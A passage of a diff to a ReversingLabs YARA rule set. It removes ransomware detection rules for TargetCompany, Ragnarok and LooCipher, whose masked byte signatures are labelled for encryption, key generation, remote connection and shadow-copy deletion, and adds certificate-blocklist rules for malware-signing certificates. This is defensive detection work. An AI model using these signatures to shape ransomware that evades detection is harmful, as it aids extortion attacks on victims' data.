"TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TargetCompany" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 53 68 ?? ?? ?? ?? 6A ?? 53 6A - ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 - BD ?? ?? ?? ?? ?? 75 ?? BF ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8D 75 ?? E8 ?? ?? ?? - ?? 50 89 5D ?? E8 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 - E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 53 68 - ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? - ?? 6A ?? 5F 53 57 56 FF B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 57 52 50 - 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 33 FF 3B F3 89 85 - ?? ?? ?? ?? 7F ?? 7C ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 33 FF 47 EB ?? B9 ?? ?? - ?? ?? 3B C1 73 ?? 53 51 56 FF B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 50 - } - $encrypt_files_p2 = { - 56 FF B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 89 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 3B FB 8B 3D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? - 89 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 FF B5 ?? - ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? ?? ?? ?? 8D 4D - ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 FF B5 ?? - ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? FF D6 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 86 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 53 53 FF B5 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? - ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 - FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 01 85 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 11 85 ?? ?? ?? ?? FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 FF B5 ?? ?? ?? ?? FF D7 8B - BD ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? - ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF - D6 57 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - } - $remote_connection_p1 = { - 55 8B EC 83 EC ?? 53 56 33 F6 57 8D 5D ?? 89 75 ?? E8 ?? ?? ?? ?? 89 75 ?? 56 56 56 - FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 3B DE 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 FF 6A ?? 8D - 45 ?? 50 FF 74 BD ?? 53 FF 15 ?? ?? ?? ?? 47 83 FF ?? 72 ?? 56 56 6A ?? 56 56 FF 75 - ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? - B8 ?? ?? ?? ?? 0F 95 C1 56 49 23 C8 03 C8 81 C9 ?? ?? ?? ?? 51 56 56 56 FF 75 ?? 89 - 4D ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 6A ?? - 5F 8D 45 ?? 50 8D 45 ?? 50 6A ?? 53 89 7D ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 81 4D ?? ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF - 75 ?? F7 D8 1B C0 50 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 56 56 8D 45 ?? - 50 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C7 50 FF 75 ?? E8 ?? ?? ?? - ?? 59 59 8D 4D ?? 51 FF 75 ?? 89 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? ?? 03 7D ?? 39 75 - ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? - 39 75 ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? - ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B C9 C3 - } - $remote_connection_p2 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 9D ?? ?? ?? ?? - 8B F9 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 45 - ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 75 - ?? B8 ?? ?? ?? ?? 50 8D 45 ?? 50 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8B F8 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 59 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 59 FF B5 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 5F 5E 33 - CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $generate_key = { - 0F 31 0F AF C8 0F AF CE 0F AF 8D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 33 FF 47 57 53 53 - 8D 85 ?? ?? ?? ?? 50 89 8D ?? ?? ?? ?? FF D6 3B C3 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? - ?? ?? 75 ?? 6A ?? 57 53 53 8D 85 ?? ?? ?? ?? 50 FF D6 3B C3 74 ?? 8D 85 ?? ?? ?? ?? - 50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 59 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C7 - B9 ?? ?? ?? ?? 8B 11 8B F2 C1 EE ?? 33 F2 69 F6 ?? ?? ?? ?? 03 F0 89 71 ?? 83 C1 ?? - 40 81 F9 ?? ?? ?? ?? 7C ?? 57 A3 ?? ?? ?? ?? FF 15 - } - $find_files_p1 = { - 8D 85 ?? ?? ?? ?? 53 53 50 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF - D6 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 33 F6 0F B7 - C6 FF 34 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 46 66 83 FE ?? 72 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? - ?? 0F 84 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 0F B7 B5 ?? ?? ?? ?? 8D 34 B5 - } - $find_files_p2 = { - FF 36 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D3 FF 36 89 85 ?? ?? - ?? ?? FF D3 8B 8D ?? ?? ?? ?? 3B C8 0F 84 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 66 83 BD ?? - ?? ?? ?? ?? 72 ?? C6 85 ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? FF 34 85 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FE 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? - ?? 72 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 ?? 6A ?? 59 FF B5 ?? ?? ?? ?? 33 C0 - 8B FE F3 AB 66 8B 85 ?? ?? ?? ?? 66 89 46 ?? FF D3 8D 44 00 ?? 50 E8 ?? ?? ?? ?? 59 - FF B5 ?? ?? ?? ?? 89 46 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 EB ?? 56 FF 15 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B - 4D ?? 5F 5E 33 CD 33 C0 5B E8 ?? ?? ?? ?? C9 C2 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($generate_key) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="4e:25:23:e7:6e:a4:55:94:1e:75:fb:82:40:47:4a:75" and 1476403200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ragnarok : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE { meta: - description = "Yara rule that detects Ragnarok ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "263a671e-dfdb-5ab8-9bb9-355c76a88c10" - date = "2020-07-15" - modified = "2020-07-15" + id = "bcf0f1cc-44f2-5498-b9d7-9ad3f38e33bc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ragnarok.yara#L1-L110" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aaa17ab98b59a5c8c71a2b82a9bf29dd3a1a1719deaf08a3bafa77895bc10311" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14332-L14348" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c1ae1562595ac6515a071a16195b46db6fad4ee0fe9757d366ee78b914e1de7f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ragnarok" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 - F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 8B E5 5D C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 - ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 - 75 ?? FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B - 5D ?? 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 - EB ?? 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF - 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 - C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C - ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 - ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 - 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? - 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? - ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? - ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 - } - $find_files_p2 = { - 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF - 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 - ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? - 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? - ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 - 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? - ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? - 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? - 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 8B 4D ?? 56 57 89 - 85 ?? ?? ?? ?? 33 FF 33 C0 89 8D ?? ?? ?? ?? 6A ?? 51 89 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8D 70 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 8A 0E - 3A 08 75 ?? 84 C9 74 ?? 8A 4E ?? 3A 48 ?? 75 ?? 83 C6 ?? 83 C0 ?? 84 C9 75 ?? 33 C0 - EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 - 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 8B 40 ?? 8B F8 E8 ?? ?? ?? ?? - 33 D2 B9 ?? ?? ?? ?? F7 F1 8A 04 3A 88 04 1E 46 83 FE ?? 7C ?? FF B5 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 33 C9 23 F9 89 8D ?? ?? ?? ?? 3D ?? ?? ?? ?? - 0F 87 ?? ?? ?? ?? 48 83 E0 ?? 83 C0 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? FF B5 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF - } - $encrypt_files_p2 = { - 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? - ?? 83 C4 ?? 33 FF 3B B5 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 3B 85 ?? ?? ?? ?? 0F 85 - ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? - ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 53 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 85 ?? ?? ?? - ?? 57 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 57 6A ?? - 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? - ?? 83 C4 ?? 3B 85 ?? ?? ?? ?? 75 ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 33 FF 56 E8 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 5B 85 C0 74 ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 33 CD - 5E E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $disable_fw_and_delete_shadow_volumes = { - 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 74 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A - ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D7 E9 ?? ?? - ?? ?? 6A ?? FF 35 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? - 50 FF 35 ?? ?? ?? ?? FF D3 6A ?? FF 35 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 8B 48 ?? 51 - FF 35 ?? ?? ?? ?? FF D3 8B F8 8D 85 ?? ?? ?? ?? 50 FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? - ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 40 ?? 50 6A ?? FF 95 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A - ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? - ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? - FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 - } - condition: - uint16(0)==0x5A4D and ($disable_fw_and_delete_shadow_volumes) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="61:02:46:82:93:ba:73:08:d1:7e:fb:43:ad:6b:fb:58" and 1470960000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Loocipher : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE { meta: - description = "Yara rule that detects LooCipher ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b5aa2bd0-72b0-5013-a60e-9b4f1ee1de1f" - date = "2020-07-15" - modified = "2020-07-15" + id = "033c9ce3-1676-5ad1-9ec1-08b3ffc585bb" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.LooCipher.yara#L1-L87" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aa0598d63b5fad6aea0945a0aa2030d3d6e2cd9f1fea16f3dd17cdceb68323e3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14350-L14366" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "20ec1e8e0570eb216304fd8453df315a26d9c170224177c325c10cbefc1993fb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "LooCipher" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection = { - 6A ?? 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 B9 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 